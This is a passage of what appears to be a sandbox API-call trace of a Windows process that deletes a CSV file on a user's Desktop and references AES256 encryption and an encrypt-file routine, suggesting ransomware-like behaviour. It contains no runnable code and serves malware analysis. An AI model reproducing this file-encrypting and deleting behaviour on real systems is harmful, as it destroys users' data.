lpFileName="C:\\Users\\FD1HVy\\Desktop\\5_pKd716n7PnD.csv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7cf2440, ftCreationTime.dwHighDateTime=0x1d5e0f3, ftLastAccessTime.dwLowDateTime=0x1551fec0, ftLastAccessTime.dwHighDateTime=0x1d5e1d0, ftLastWriteTime.dwLowDateTime=0x1551fec0, ftLastWriteTime.dwHighDateTime=0x1d5e1d0, nFileSizeHigh=0x0, nFileSizeLow=0x13fbd, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="5_pKd716n7PnD.csv", cAlternateFileName="5_PKD7~1.CSV")) returned 0xa87550 [0134.422] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5_pKd716n7PnD.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\5_pkd716n7pnd.csv")) returned 1 [0134.515] FindNextFileW (in: hFindFile=0xa87550, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7cf2440, ftCreationTime.dwHighDateTime=0x1d5e0f3, ftLastAccessTime.dwLowDateTime=0x1551fec0, ftLastAccessTime.dwHighDateTime=0x1d5e1d0, ftLastWriteTime.dwLowDateTime=0x1551fec0, ftLastWriteTime.dwHighDateTime=0x1d5e1d0, nFileSizeHigh=0x0, nFileSizeLow=0x13fbd, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="5_pKd716n7PnD.csv", cAlternateFileName="5_PKD7~1.CSV")) returned 0 [0134.516] FindClose (in: hFindFile=0xa87550 | out: hFindFile=0xa87550) returned 1 [0134.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0134.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0134.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0134.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0134.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0134.518] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0134.518] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0134.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0134.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0134.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0134.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0134.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0134.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0134.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0134.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0134.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e563a8 [0134.518] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/5_pKd716n7PnD.csv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\5_pKd716n7PnD.csv", lpFilePart=0x8cf650*="5_pKd716n7PnD.csv") returned 0x29 [0134.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0134.519] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5_pKd716n7PnD.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\5_pkd716n7pnd.csv")) returned 0xffffffff [0134.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0134.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0134.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0134.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0134.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0134.519] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0134.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0134.519] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0134.519] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0134.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0134.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0134.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0134.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0134.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0134.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0134.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0134.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0134.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0134.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0134.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0134.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0134.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0134.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AES256Encrypt.256", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0134.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ES256Encrypt.256", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0134.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S256Encrypt.256", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0134.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="256Encrypt.256", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0134.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="56Encrypt.256", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0134.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Encrypt.256", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0134.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Encrypt.256", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0134.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ncrypt.256", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0134.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crypt.256", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0134.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rypt.256", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0134.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ypt.256", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0134.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt.256", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0134.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t.256", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0134.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0134.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0134.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0134.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0134.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0134.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0134.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0134.520] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0134.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0134.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0134.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0134.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0134.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0134.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0134.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0134.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0134.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0134.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0134.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0134.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0134.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0134.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0134.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0134.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0134.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0134.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AES256Encrypt.256", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0134.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ES256Encrypt.256", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0134.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S256Encrypt.256", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0134.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="256Encrypt.256", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0134.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="56Encrypt.256", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0134.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Encrypt.256", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0134.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Encrypt.256", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0134.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ncrypt.256", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0134.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crypt.256", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0134.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rypt.256", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0134.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ypt.256", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0134.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt.256", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0134.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0134.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0134.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0134.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0134.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0134.522] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0134.522] TranslateMessage (lpMsg=0x8cf968) returned 0 [0134.522] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0134.522] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0134.522] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0134.523] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0134.523] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0134.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0134.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0134.523] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0134.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0134.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0134.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0134.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0134.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0134.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0134.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0134.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0134.524] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0134.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0134.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0134.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0134.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0134.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0134.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53860 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0134.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0134.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0134.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0134.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0134.525] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0134.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0134.526] RtlAllocateHeap (HeapHandle=0x970000, 